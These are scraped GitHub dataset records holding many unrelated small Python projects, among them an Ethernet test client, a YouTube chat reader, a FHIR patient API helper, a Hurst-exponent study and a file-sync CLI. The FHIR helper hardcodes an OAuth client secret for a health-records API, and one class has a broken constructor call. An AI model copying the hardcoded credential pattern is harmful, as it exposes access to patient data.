Tree:\n def __init__(self):\n self.root = None\n\n def empty(self):\n return self.root == None\n\n def insert(self, value):\n # Cuando se inserta un valor, siempre se crea un nuevo nodo\n if self.empty():\n self.root = Node(value)\n else:\n self.root._insert(Node(value)) \n while self.root.parent:\n self.root = self.root.parent\n return True\n\n def remove(self, apellido):\n return self.root._remove(apellido)\n\n def find(self, apellido):\n return self.root._find(apellido)\n\n def pre_order(self):\n self.root._preorder()\n\n def agregarContacto(self):\n print(\"Agregar nombre: \")\n nombre = input()\n print(\"Agregar apellido: \")\n apellido = input()\n print(\"Agregar telefono: \")\n telefono = input()\n print(\"Agregar email: \")\n email = input()\n nuevo = Contacto(nombre, apellido, telefono, email)\n return self.insert(nuevo)\n\n def ingresarNContactos(self, n):\n from random import randint\n fake = Faker()\n inicio = time()\n for i in range(0, n):\n x = fake.name()\n y = x.split()\n email = fake.email()\n telefono = str(randint(11111111, 99999999))\n nuevo = Contacto(y[0], y[1], telefono, email)\n self.insert(nuevo)\n termino = time()\n print(termino-inicio)\nif __name__ == \"__main__\":\n fake = Faker()\n lista= Tree() \n lista.ingresarNContactos(1000)\n tiempo2 = time()\n lista.find(fake.name().split()[1])\n print(time()-tiempo2)\n\n\n","repo_name":"Rhaigtz/Tarea-EDD-2018","sub_path":"Estructuras/Tree.py","file_name":"Tree.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29795261994","text":"import argparse\nimport socket\nimport struct\nimport sys\nimport time\nimport datetime\nimport signal\nfrom ethtestraw_lib import (\n make_eth_header,\n get_eth_header,\n ETR_ETHER_TYPE,\n get_mac_address,\n) # noqa: E402\n\ntool_description = \"\"\"\nSimple test tool for ethernet interfaces.\nTests a ethernet NIC against a NIC on a peer machine.\nRequires the corresponding server running on the peer machine\n\"\"\"\n\nPAYLOAD_BYTES = 1500\nMAX_PACKET_SIZE = 2048 # for receive, should be a power of 2\n\nseq_number = 0\n\n\nclass Stats:\n def __init__(self):\n self.start_time = datetime.datetime.now()\n self.packets_sent = 0\n self.good_packets_received = 0\n self.error_count = 0\n\n def elapsed_seconds(self):\n elapsed = datetime.datetime.now() - self.start_time\n return elapsed.total_seconds()\n\n def bytes_per_second(self):\n return (\n self.good_packets_received * (PAYLOAD_BYTES + 14)\n ) / self.elapsed_seconds()\n\n def __str__(self):\n return (\n f\"sent pkts: {self.packets_sent:5d}, \"\n f\"errors/lost pkts: {self.error_count:3d}, \"\n f\"{self.bytes_per_second()/1e6:6.2f} MByte/s\"\n )\n\n\ndef update_stats(\n global_stats, interval_stats, packets_sent, packets_received, error_count\n):\n for stats in [global_stats, interval_stats]:\n stats.packets_sent += packets_sent\n stats.good_packets_received += packets_received\n stats.error_count += error_count\n\n\ndef client(args):\n global seq_number\n\n exit_code = 0\n src_mac_string = get_mac_address(args.ifname)\n src_mac = mac_address_string_to_bytes(src_mac_string)\n\n print(f\"Own Mac: Interface={args.ifname}, \" f\"{src_mac_string} dest:{args.dst_mac}\")\n s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETR_ETHER_TYPE))\n s.bind((args.ifname, 0))\n s.settimeout(args.timeout)\n\n global_stats = Stats()\n interval_stats = Stats()\n\n signal.signal(signal.SIGINT, signal.default_int_handler)\n\n send_seq = 0\n\n try:\n while True:\n if (\n args.runtime is not None\n and global_stats.elapsed_seconds() > args.runtime # noqa: W503\n ):\n break\n\n send_frame(src_mac, s, send_seq, args)\n\n try:\n recv_frame(src_mac, s, args)\n update_stats(global_stats, interval_stats, 1, 1, 0)\n\n except (socket.timeout, RuntimeError) as err:\n if args.verbose:\n print(f\"seq {send_seq}: Rx error: {err}\")\n update_stats(global_stats, interval_stats, 1, 0, 1)\n\n if (\n args.error_threshold != -1\n and global_stats.error_count >= args.error_threshold # noqa: W503\n ):\n print(\"Stopped because error threshold reached\")\n exit_code = 1\n break\n send_seq += 1\n\n if interval_stats.elapsed_seconds() > args.interval:\n print(interval_stats)\n interval_stats = Stats()\n\n if args.delay is not None:\n time.sleep(args.delay / 1e6)\n\n except KeyboardInterrupt:\n print(\"Stopped\")\n finally:\n print(f\"Total Stats: {global_stats}\")\n\n sys.exit(exit_code)\n\n\ndef send_frame(src_mac, s, seq_number, args):\n eth_hdr = make_eth_header(src_mac, mac_address_string_to_bytes(args.dst_mac))\n payload = make_payload(PAYLOAD_BYTES, seq_number)\n frame = eth_hdr + payload\n s.send(frame)\n\n\ndef recv_frame(src_mac, s, args):\n while True:\n # Ignore frames that are not for us. Seems to be a bug in linux stack\n pkt_bytes = s.recv(MAX_PACKET_SIZE)\n rcv_dst_mac, _, _ = get_eth_header(pkt_bytes)\n if rcv_dst_mac == src_mac:\n break\n\n validate_frame(pkt_bytes, src_mac, args)\n\n\ndef validate_frame(pkt_bytes, src_mac, args):\n global seq_number\n rcv_dst_mac, rcv_src_mac, rcv_type = get_eth_header(pkt_bytes)\n\n rcv_dst_mac_str = mac_address_bytes_to_string(rcv_dst_mac)\n rcv_src_mac_str = mac_address_bytes_to_string(rcv_src_mac)\n\n if rcv_dst_mac != src_mac:\n raise RuntimeError(\n f\"Bad dst mac {rcv_dst_mac_str} received. Expected {mac_address_bytes_to_string(src_mac)}\"\n )\n\n if rcv_src_mac_str != args.dst_mac.lower():\n raise RuntimeError(\n f\"Bad src mac {rcv_src_mac_str} received. Expected {args.dst_mac}\"\n )\n\n if rcv_type != ETR_ETHER_TYPE:\n raise RuntimeError(\n f\"Bad eth type {rcv_type} received. Expected {ETR_ETHER_TYPE}\"\n )\n\n rcv_seq_number = get_payload(pkt_bytes)[0]\n\n exp_seq_number = seq_number\n\n seq_number = rcv_seq_number + 1 # resync with sender\n\n if rcv_seq_number != exp_seq_number:\n raise RuntimeError(\n f\"Bad seq number {rcv_seq_number} received. Expected {exp_seq_number}\"\n )\n\n\ndef make_payload(payload_length, seq_number):\n payload_hdr = struct.pack(\"!L\", seq_number)\n payload = payload_hdr + bytes(payload_length - len(payload_hdr))\n return payload\n\n\ndef get_payload(pkt_bytes):\n return struct.unpack(\"!L\", pkt_bytes[14:18])\n\n\ndef mac_address_string_to_bytes(addr_string):\n mac_elems = addr_string.split(\":\")\n if len(mac_elems) != 6:\n raise ValueError(f\"malformed mac: ${addr_string}\")\n\n data = bytearray(6)\n for i in range(6):\n data[i] = int(mac_elems[i], 16)\n return data\n\n\ndef mac_address_bytes_to_string(addr_bytes):\n s = \"\"\n for i in range(6):\n s += \"%02x\" % addr_bytes[i]\n if i < 5:\n s += \":\"\n return s\n\n\ndef command_line_args_parsing():\n parser = argparse.ArgumentParser(description=tool_description)\n parser.add_argument(\"ifname\", help=\"Name of local interface (e.g. eth0)\")\n parser.add_argument(\"dst_mac\", help=\"Peer's MAC address (e.g. 00:11:22:33:44:55)\")\n parser.add_argument(\n \"-r\",\n \"--runtime\",\n help=\"runtime in seconds. (default: run forever)\",\n type=int,\n default=None,\n )\n parser.add_argument(\n \"-d\",\n \"--delay\",\n help=\"Delay in microseconds between pings (default: None)\",\n type=int,\n default=None,\n )\n parser.add_argument(\n \"-t\",\n \"--timeout\",\n help=\"Timeout in seconds to wait for peer reply (default: 0.1)\",\n type=float,\n default=0.1,\n )\n parser.add_argument(\n \"-e\",\n \"--error_threshold\",\n help=\"stop after n errors, -1 to stop never (default: 1)\",\n type=int,\n default=1,\n )\n parser.add_argument(\n \"-i\",\n \"--interval\",\n help=\"print statistics after x seconds (default: 0.5)\",\n type=float,\n default=0.5,\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"Be verbose\",\n action=\"store_true\",\n )\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = command_line_args_parsing()\n client(args)\n","repo_name":"ci4rail/eth-test-raw","sub_path":"eth-test-raw-client.py","file_name":"eth-test-raw-client.py","file_ext":"py","file_size_in_byte":7031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44056184110","text":"from pytchat import LiveChat\nimport time\n\n\ndef read_youtube_chat(video_id, history_file, newest_chat_file):\n chat = LiveChat(video_id)\n processed_chat_messages = set() # Set to store processed chat messages\n\n while chat.is_alive():\n for c in chat.get().sync_items():\n chat_message = f\"viewer:{c.author.name} say: {c.message}\"\n if chat_message not in processed_chat_messages:\n print(chat_message)\n with open(history_file, \"a\", encoding=\"utf-8\") as file:\n file.write(\"\\n\" + chat_message)\n processed_chat_messages.add(chat_message)\n with open(newest_chat_file, \"w\", encoding=\"utf-8\") as file:\n file.write(chat_message)\n\n time.sleep(1) # Add a delay to avoid excessive API requests\n\n\nvideo_id = \"\" # you can get your video id at your youtube live url for example https://www.youtube.com/watch?v=CSdEsXa your video id is CSdEsXa\nnewest_chat_file = \"NewestChat.txt\"\nhistory_file = \"ChatHistory.txt\"\n\nwhile True:\n read_youtube_chat(video_id, history_file, newest_chat_file)\n time.sleep(1)\n","repo_name":"ZeroMirai/Waifu_AI_Vtuber","sub_path":"youtube_chat.py","file_name":"youtube_chat.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"30833308879","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom notes import views\n\n\nurlpatterns = [\n path('', views.note_list_view, name='main_list'),\n path('finished_items//', views.done_item, name='finish_item'),\n path('deleted_items//', views.delete_item, name='delete_item'),\n path('recovered_items//', views.recover_item, name='recover_item'),\n\n\n path('admin/', admin.site.urls),\n]\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"Raef96/NotePad_App","sub_path":"src/notepad/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74933357950","text":"import json\nimport re\nfrom matplotlib import pyplot\nimport numpy as np\n#from collections import defaultdict\n\nwith open('ca_boundaries.json', 'r') as f:\n ca_json = json.load(f)\n#\n\n# this file really has city-level boundaries as well as \n# county, but doesn't have aggregate county data...\n#\n# build county-level tools here.\n\n# basic structure... (just of what we need)\n# dict\n# |- features (list)\n# |- |- attributes (dict; city and county information; camelcase + \"County\"\n# |- |- geometry (dict)\n# |- |- |- rings (list of connectected regions; each a list of duples of (lon, lat)\n\ncounty_dict = {}\nareas = {}\nfor geom in ca_json['features']:\n county = geom['attributes']['COUNTY']\n county = re.match('([a-zA-Z\\ ]{1,}) County', county).groups(0)[0].upper()\n if county not in county_dict:\n county_dict[county] = geom['geometry']['rings']\n areas[county] = geom['attributes']['Shape__Area']\n else:\n county_dict[county] += geom['geometry']['rings']\n areas[county] += geom['attributes']['Shape__Area']\n#\n\ndef state_map(df, colname, vmin=None, vmax=None, ax=None, cmap=pyplot.cm.viridis, popscale=False):\n vals = df[colname].values\n counties = df['COUNTY'].values\n if vmin is None:\n vmin = np.nanmin(vals)\n if vmax is None:\n vmax = np.nanmax(vals)\n if vmax==vmin:\n vmax = vmin + 1\n #\n color = lambda xx : cmap( float( (xx-vmin)/(vmax-vmin) ) )\n \n if ax is None:\n print('noax')\n returnflag = True\n fig,ax = pyplot.subplots(1,1) \n else:\n returnflag = False\n #\n \n if popscale:\n # import county population data and use it to scale down sizes of counties.\n import load_county_populations as lcp\n pops = lcp.df[2019].values\n county_areas = np.array( [areas[c] for c in lcp.df['COUNTY'].values] ) # to be continued\n scales = pops/county_areas\n scales = np.sqrt( scales/max(scales) )\n lcp.df['scales'] = scales\n #\n for c,v in zip(counties,vals):\n# print(c,v)\n for r in county_dict[c]:\n xy = np.array(r, dtype=float)\n if popscale:\n ax.plot(xy[:,0], xy[:,1], c='#999', lw=0.2, zorder=-100)\n center = np.mean(xy, axis=0)\n xy -= center\n xy *= lcp.df[lcp.df['COUNTY']==c]['scales']\n xy += center\n #\n ax.fill(xy[:,0], xy[:,1], facecolor=color(v), edgecolor=[0,0,0,0])\n# xym = np.nanmean(np.concatenate(county_dict[c]), axis=0)\n# ax.text(xym[0],xym[1],c, fontsize=8)\n #\n ax.axis('equal')\n return ax\n#\n","repo_name":"maminian/newsom_recall_map_2021","sub_path":"load_geometry.py","file_name":"load_geometry.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13654210139","text":"import requests\n\ndef get_access_token():\n\n client_id = '216'\n client_secret = '7f90c58a2cf9e812d73973508bd23b20'\n scope = 'system/*.*'\n\n form_params = {\n 'grant_type': 'client_credentials',\n 'client_id': client_id,\n 'client_secret': client_secret,\n 'scope': scope\n }\n\n token_url = \"https://app.azaleahealth.com/fhir/R4/142442/oauth/token\"\n\n response = requests.post(token_url, data=form_params)\n response.raise_for_status()\n\n token_data = response.json()\n return token_data['access_token']\n\n\ndef get_all_patients():\n\n access_token = get_access_token()\n\n get_url = \"https://app.azaleahealth.com/fhir/R4/142442/Patient\"\n headers = { 'Authorization': f'Bearer {access_token}' }\n\n response = requests.get(get_url, headers=headers)\n response.raise_for_status()\n\n if response.status_code == 200:\n return response.json()\n else:\n print(f\"Error: {response.status_code}\")\n\ndef get_patient(id):\n \n access_token = get_access_token()\n\n get_url = f\"https://app.azaleahealth.com/fhir/R4/142442/Patient?_id={id}\"\n headers = { 'Authorization': f'Bearer {access_token}' }\n\n response = requests.get(get_url, headers=headers)\n response.raise_for_status()\n\n response_json = response.json()\n\n patient_information = {\n 'name': response_json['entry'][0]['resource']['name'][0]['text']\n }\n\n if response.status_code == 200:\n return patient_information['name']\n else:\n print(f\"Error: {response.status_code}\")","repo_name":"AustinCGause/Project-Files","sub_path":"azaleaproject/patientportal/apihelper.py","file_name":"apihelper.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5808534775","text":"from brownie import accounts, config, SimpleStorage, network\n\n\ndef deploy_simple_storage():\n # brownie accounts new kovanTestNet\n account = get_account()\n #account = accounts.load(\"kovanTestNet\")\n #account = accounts[0]\n print(account)\n simple_storage = SimpleStorage.deploy({\"from\": account})\n print(simple_storage)\n stored_value = simple_storage.retrieve()\n print(stored_value)\n transaction = simple_storage.store(15, {\"from\": account})\n transaction.wait(1)\n updated_stored_value = simple_storage.retrieve()\n print(updated_stored_value)\n\n\ndef get_account():\n if network.show_active() == \"development\":\n return accounts[0]\n else:\n return accounts.load(\"kovanTestNet\")\n\n\ndef main():\n deploy_simple_storage()\n","repo_name":"Dirty-Dish/NftCarRace","sub_path":"scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70760728798","text":"import numpy as np\nimport math\nimport pandas as pd\nfrom fbm import FBM\nimport hurst\nfrom numpy import std, subtract, polyfit, sqrt, log\nfrom pro_draw import draw_y,draw_xy,log_draw_xy\nimport matplotlib.pyplot as plt\n\nfrom visibility_graph import VG,HVG\nfrom box_cover import GC\nimport networkx as nx\nfrom WCF import Generate_WCF\nimport time\n\n\n\n\ndef hurst1(ts):\n ts = list(ts)\n N = len(ts)\n if N < 20:\n raise ValueError(\"Time series is too short! input series ought to have at least 20 samples!\")\n\n max_k = int(np.floor(N / 2))\n R_S_dict = []\n for k in range(10, max_k+1):\n R, S = 0, 0\n # split ts into subsets\n subset_list = [ts[i:i + k] for i in range(0, N, k)]\n if np.mod(N, k) > 0:\n subset_list.pop()\n # tail = subset_list.pop()\n # subset_list[-1].extend(tail)\n # calc mean of every subset\n mean_list = [np.mean(x) for x in subset_list]\n for i in range(len(subset_list)):\n cumsum_list = pd.Series(subset_list[i] - mean_list[i]).cumsum()\n R += max(cumsum_list) - min(cumsum_list)\n S += np.std(subset_list[i])\n R_S_dict.append({\"R\": R / len(subset_list), \"S\": S / len(subset_list), \"n\": k})\n\n log_R_S = []\n log_n = []\n print(R_S_dict)\n for i in range(len(R_S_dict)):\n R_S = (R_S_dict[i][\"R\"] + np.spacing(1)) / (R_S_dict[i][\"S\"] + np.spacing(1))\n log_R_S.append(np.log(R_S))\n log_n.append(np.log(R_S_dict[i][\"n\"]))\n draw_xy(log_n,log_R_S)\n Hurst_exponent = np.polyfit(log_n, log_R_S, 1)[0]\n return Hurst_exponent\n\ndef hurst2(ts):\n \"\"\"Returns the Hurst Exponent of the time series vector ts\"\"\"\n\n # create the range of lag values\n i = len(ts) // 2\n lags = range(2, i)\n # Calculate the array of the variances of the lagged differences\n tau = [sqrt(std(subtract(ts[lag:], ts[:-lag]))) for lag in lags]\n\n # use a linear fit to estimate the Hurst Exponent\n poly = polyfit(log(lags), log(tau), 1)\n\n # Return the Hurst Exponent from the polyfit output\n return poly[0]*2\n\ndef repeat_task(series,N):\n f = FBM(n=10000, hurst=0.75, length=1, method='daviesharte')\n for i in range(N):\n H, c, data = hurst.compute_Hc(f.fbm() + 10., kind='price', simplified=True)\n yield H\n\ndef repeat_by(func,N):\n all_times = func()\n for _ in range(N-1):\n count = 0\n for each in func():\n all_times[count] += each\n count += 1\n print(_)\n return [x/N for x in all_times]\n\ndef d_h_test(H=None,f=None):\n if not H:\n H = [x / 100 for x in range(1, 100)]\n fractal_d = []\n for h in H:\n if not f:\n f = FBM(n=2000, hurst=h, length=1, method='daviesharte')\n series = f.fbm()\n G = VG(series)\n #Y = nx.degree_histogram(G)\n #print(Y)\n X, Y = GC(G)\n LogXI, LogYI = [], []\n for x in X:\n LogXI.append(math.log(x))\n for y in Y:\n LogYI.append(math.log(y))\n fractal_d.append(-1 * np.polyfit(LogXI, LogYI, 1)[0])\n #print(Y)\n return fractal_d\n\nif __name__ == '__main__':\n # random_changes = 1. + np.random.randn(500) / 1000.\n # f = FBM(n=5000, hurst=0.5, length=1, method='daviesharte')\n #series = hurst.random_walk(10000,proba=0.3)\n #H = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]\n H = [0.05*i for i in range(1,19)]\n core_n = []\n for h in H:\n f = FBM(n=1000, hurst=h, length=1, method='daviesharte')\n # series = Generate_WCF(5,h,2000)\n series = f.fbm()\n G = HVG(series)\n X,Y = GC(G)\n log_draw_xy(X,Y)\n #core_n.append(nx.k_core(G).number_of_nodes())\n #print(core_n)\n\n # X,Y = GC(G)\n # LogXI, LogYI = [], []\n # for x in X:\n # LogXI.append(math.log(x))\n # for y in Y:\n # LogYI.append(math.log(y))\n # fractal_d.append(-1 * np.polyfit(LogXI, LogYI, 1)[0])\n # X =[]\n # for i in range(1,len(H)+1):\n # X.append(i)\n # log_draw_xy(X,fractal_d)\n # fd = []\n # for h in H:\n # fd.append(2-h)\n # log_draw_xy(fd,fractal_d)\n #print(hurst1(series))\n #hurst1(list(range(1,50)))\n # print(hurst2(series))\n # H, c, data = hurst.compute_Hc(series, kind='random_walk', simplified=True)\n # print(H)\n # print(d_h_test(f=f))\n # series = np.cumprod(random_changes)\n # H = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]\n #Y = repeat_by(d_h_test,100)\n #H = [x / 100 for x in range(1, 100)]\n #draw_xy(H,Y)\n","repo_name":"DvDxx/fractal_d","sub_path":"Hurst.py","file_name":"Hurst.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"51"} +{"seq_id":"28957305199","text":"from argparse import ArgumentParser\nimport numpy as np\nfrom model import Model\nimport json\n\n\nmodel: Model = None\n\ndef predict(data):\n \n for line in data:\n for char in line:\n image = np.clip(np.array(char, dtype=np.float64), 0, 1) * 255\n image = image.astype(np.uint8)\n if np.sum(image) <= 0.001:\n print(' ', end='')\n continue \n \n code = model.predict(image)\n \n print(chr(code), end='')\n print()\n\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('model_path', help='a path to the image classifier model')\n parser.add_argument('json_data', help='path to json format')\n \n args = parser.parse_args()\n\n model = Model(args.model_path)\n \n f = open(args.json_data)\n data = json.load(f)\n f.close()\n\n print(\"\\n\\n\\n ############## Encoded text ##############\")\n predict(data)\n","repo_name":"pawel2000pl/AO_Project","sub_path":"letter_classification/appNoServer.py","file_name":"appNoServer.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19899776654","text":"#this is a problem demonstrating a simple task creation app that creates a project with a deadline\r\n\r\nclass Project(object):\r\n \"\"\"docstring for Project\"\"\"\r\n def __init__(self, project_name, project_description, project_deadline):\r\n self.project_name = project_name\r\n self.project_deadline = project_deadline\r\n self.project_description = project_description\r\n\r\n\r\n#Inheritance of Project into User module\r\nclass User(Project):\r\n \"\"\"docstring for User\"\"\"\r\n def __init__(self, first_name, last_name):\r\n Project.__init__(project_name, project_description, project_deadline)\r\n self.first_name = first_name\r\n self.last_name = last_name\r\n\r\n\r\np = Project(\"ProjectOne\", \"A project about contructing a building\", \"10/03/2017\")\r\nprint(p)\r\n \r\n","repo_name":"roselynemakena/andelabs","sub_path":"real_world.py","file_name":"real_world.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22703109039","text":"import sys\r\n\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QTabWidget, QVBoxLayout\r\n\r\nfrom GUI.Tabs.SettingsTab import Settings\r\nfrom GUI.Tabs.TextChat import TextChat\r\n\r\napp = QApplication(sys.argv)\r\n\r\n\r\nclass ChatAppMainWindow(QWidget):\r\n\r\n def __init__(self):\r\n super(QWidget, self).__init__()\r\n\r\n self.tabs = QTabWidget()\r\n self.SettingsTab = Settings(self.tabs)\r\n self.TextChatTab = TextChat(self.tabs)\r\n\r\n self.setupUI()\r\n\r\n def add_tabs(self):\r\n self.tabs.addTab(self.TextChatTab, 'TextChat')\r\n self.tabs.addTab(self.SettingsTab, 'Settings')\r\n\r\n def setupUI(self):\r\n self.setWindowTitle('TFS Chat App')\r\n self.root_layout = QVBoxLayout(self)\r\n self.root_layout.setObjectName('MainWindow_root_layout')\r\n self.add_tabs()\r\n self.root_layout.addWidget(self.tabs)\r\n\r\n with open('tfsc.css', 'r') as styles:\r\n self.setStyleSheet(styles.read())\r\n\r\n\r\npage = ChatAppMainWindow()\r\n\r\npage.show()\r\napp.exec()\r\n","repo_name":"TFSComputerScienceClub/Chat-App","sub_path":"Client/gui_launch.py","file_name":"gui_launch.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30326173610","text":"class Fighter:\n def __init__(self, name):\n self.name = name\n self.health = 100\n self.damage = 10\n\n def attack(self, other_guy):\n other_guy.health = other_guy.health - self.damage\n print(\"{} attacks {}!\".format(self.name, other_guy.name))\n print(\"{} loses {} health points!\".format(other_guy.name, self.damage))\n\n def __str__(self):\n return \"{}: {}\".format(self.name, self.health)\n\nqazi = Fighter(\"Qazi\")\nyou = Fighter(\"Matt\")\n\nprint(qazi) # Qazi: 100\nprint(you)\n\nyou.attack(qazi)\nprint(qazi)\n","repo_name":"CleverProgrammer/cleverprogrammer_stuff","sub_path":"OOP/string_representation.py","file_name":"string_representation.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":790,"dataset":"github-code","pt":"51"} +{"seq_id":"31904603619","text":"liczba = [2, 10, 12, 15, 20, 25, 30, 35]\nliczba2 = [5, 3460, 242, 15, 204, 2475, 3480, 385]\n\n#mapa\n\ndef funkcja(x):\n return x * x\n\nwynik = map(funkcja, liczba)\nprint(list(wynik))\n\nwynik2 = map(lambda x: x*x, liczba2)\nprint(list(wynik2))\n\n#filtry\n\nwynik3 = filter(lambda x: x % 2 == 0, liczba2) #zawsze 1 argument, wynik w postaci T/F\nprint(list(wynik3))","repo_name":"Unsimpable2/PythonLearning","sub_path":"Podstawy/mapa_filtry.py","file_name":"mapa_filtry.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17419039697","text":"import ROOT\nimport os\nfrom EfficiencyPlots import EfficiencyPlots, PlotInfo\n\n\n\ninputFileName = \"../../../Histos/StudyFakeRate/MuTau/W/v_5_2015-11-25/fakerates_MuTau_W.root\"\nplotDir = \"plots/\"\nname = \"IdealFakeFactors_MuTau\"\nsystems = []\nsystems.append(\"\")\n\nselectionLevels = []\nselectionLevels.append((\"StandardIso\",))\n\nreferenceLevels = []\nreferenceLevels.append((\"NoIso\",))\n\nreferenceLevels2 = []\nreferenceLevels2.append((\"InvertIso\",))\n\nnames = []\nnames.append(\"VsNoIso\")\n\nnames2 = []\nnames2.append(\"VsInvertIso\")\n\nvariables = [\"mvis_vs_match5\"]\nvariableNames = {}\nvariableNames[\"mvis_vs_match5\"] = \"M_{vis} [GeV]\"\n\n\n\nplotInfos = [PlotInfo()]\nplotInfos[0].markerStyle = 20\nplotInfos[0].yTitle = \"Fake factor\" \n\nif not os.path.exists(plotDir+\"/\"+name):\n os.makedirs(plotDir+\"/\"+name)\noutputFile = ROOT.TFile.Open(plotDir+\"/\"+name+\"/\"+name+\".root\", \"RECREATE\")\n\nefficiencyPlots = []\n\neffPlots = EfficiencyPlots()\neffPlots.name = name\neffPlots.histoBaseName = \"hFakeRate\"\neffPlots.inputFileNames = [[inputFileName]]\neffPlots.systems = systems\neffPlots.selectionLevels = selectionLevels\neffPlots.plotInfos = plotInfos\neffPlots.referenceLevels = referenceLevels \neffPlots.individualNames = names\neffPlots.variables = variables\neffPlots.variableNames = variableNames\neffPlots.outputFile = outputFile\neffPlots.plot(0., 0.5)\nefficiencyPlots.append(effPlots)\n\neffPlots = EfficiencyPlots()\neffPlots.name = name\neffPlots.histoBaseName = \"hFakeRate\"\neffPlots.inputFileNames = [[inputFileName]]\neffPlots.systems = systems\neffPlots.selectionLevels = selectionLevels\neffPlots.plotInfos = plotInfos\neffPlots.referenceLevels = referenceLevels2 \neffPlots.individualNames = names2\neffPlots.variables = variables\neffPlots.variableNames = variableNames\neffPlots.outputFile = outputFile\neffPlots.divideOption = \"pois\"\neffPlots.plot(0., 0.5)\nefficiencyPlots.append(effPlots)\n\n\noutputFile.Close()\n","repo_name":"jbsauvan/H2Taus-Studies","sub_path":"FakeRate/ComputeFakeRates/plotIdealFakeFactors_MuTau.py","file_name":"plotIdealFakeFactors_MuTau.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"39807995778","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n这是R File Sync的启动端\n建议编译成exe,放在环境变量中使用\n\"\"\"\n__author__ = 'Roney'\n\nfrom client import *\nimport sys\n\ndef print_help():\n info = \"\"\"\n****************** R File Sync ******************\nThis is a client and the work path can only be the current path!\nUsage: rfs.py Action [Arguments]\nAction:\n initialize: rfs.py init remote_server remote_path\n # Initialize the work path and the remote path. The remote path must not exist.\n test: rfs.py test\n # Test the read and write permissions of both files.\n different: rfs.py diff\n # Compare the differences between the both files.\n push: rfs.py push [y]\n # Synchronize local files to the server.\n pull: rfs.py pull [y]\n # Synchronize server files to the local.\nExplain:\n [y] stands for optional, so I recommend not using it.\n\n \"\"\"\n print(info)\n\n\ndef print_error(info,b_help=False):\n print(\"******************\\n{}\\n******************\".format(info))\n if b_help:\n print_help()\n\n\ndef print_success():\n print(\"\\n******************\\nRun success!!!\\n******************\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print_help()\n else:\n action = sys.argv[1]\n if action == \"init\":\n if len(sys.argv) == 4:\n remote_server,remote_path = sys.argv[2],sys.argv[3]\n if init(remote_server, remote_path):\n print_success()\n else:\n print_error(\"remote_server:{} remote_path:{} not init.\".format(remote_server,remote_path))\n else:\n print_error(\"Input error.\", True)\n elif action == \"test\":\n if test():\n print_success()\n else:\n print_error(\"Test error.\")\n elif action == \"diff\":\n if diff() is not None:\n print_success()\n else:\n print_error(\"Diff error.\")\n\n elif action == \"push\":\n diff_dict = diff()\n if diff_dict:\n if len(sys.argv) >= 3:\n c = sys.argv[2].upper()\n else:\n c = input(\"\\nPush [Y/y/N/n] : \").upper()\n if c == \"Y\":\n if push(diff_dict):\n print_success()\n else:\n print_error(\"Push error.\")\n else:\n print_error(\"Diff error.\")\n elif action == \"pull\":\n diff_dict = diff()\n if diff_dict:\n if len(sys.argv) >= 3:\n c = sys.argv[2].upper()\n else:\n c = input(\"\\nPush [Y/y/N/n] : \").upper()\n if c == \"Y\":\n if pull(diff_dict):\n print_success()\n else:\n print_error(\"Pull error.\")\n else:\n print_error(\"Diff error.\")\n else:\n print_error(\"Input error.\", True)\n","repo_name":"roney123/FileSync","sub_path":"rfs.py","file_name":"rfs.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"26343203594","text":"# This is the code to get the annotation files\n# Here, we have a file with a list of annotation accession and .tab files where the download link for each of the files exists.\n\n########################################\n# 0. Initials \n########################################\n\nimport urllib\nimport linecache\nimport pickle\nimport re\nimport numpy as np\nimport pandas as pd\nimport subprocess as sp\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom QC_transcriptionComparison_util import Gene, Exon, Annotation, AnnotationClass\n\n# General data 